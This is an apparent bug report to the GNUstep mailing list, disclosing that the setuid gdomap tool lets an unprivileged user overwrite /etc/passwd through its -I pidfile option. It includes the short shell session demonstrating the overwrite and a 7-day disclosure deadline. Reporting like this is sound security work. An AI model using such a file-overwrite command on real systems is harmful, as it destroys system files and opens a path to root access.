Can I please beg you to make gdomap run as a user other than root by default!?
I am using gnustep-base-1.3.3 compiled from source; running on RedHat Linux 7.3. Everything is default apart from using flattened paths in gnustep-make. Today's problem: -- [shykta@mixmaster shykta]$ id -a uid=500(shykta) gid=100(users) groups=100(users),3(sys),20(games) [shykta@mixmaster shykta]$ la /etc/passwd -rw-r--r-- 1 root root 1592 Jul 2 19:15 /etc/passwd [shykta@mixmaster shykta]$ tail -n 1 /etc/passwd demouser:x:505:505::/home/demouser:/bin/bash [shykta@mixmaster shykta]$ /usr/GNUstep/System/Tools/gdomap -I /etc/passwd [shykta@mixmaster shykta]$ tail -n 1 /etc/passwd 28812 -- That's a very, very bad thing to happen. I'm sure there's even a creative way for a unprivileged user to get root access using this bug. I don't want to sound unfriendly (I like GNUstep) but I'm going to wait 7 days for a response to this email, and if I haven't heard from you by then, I'll be thinking about how to disclose this. ( a' la RFPolicy - http://www.wiretrip.net/rfp/policy.html ) I apologise for the inconvenience! James. _______________________________________________ Bug-gnustep mailing list [EMAIL PROTECTED] http://mail.gnu.org/mailman/listinfo/bug-gnustep
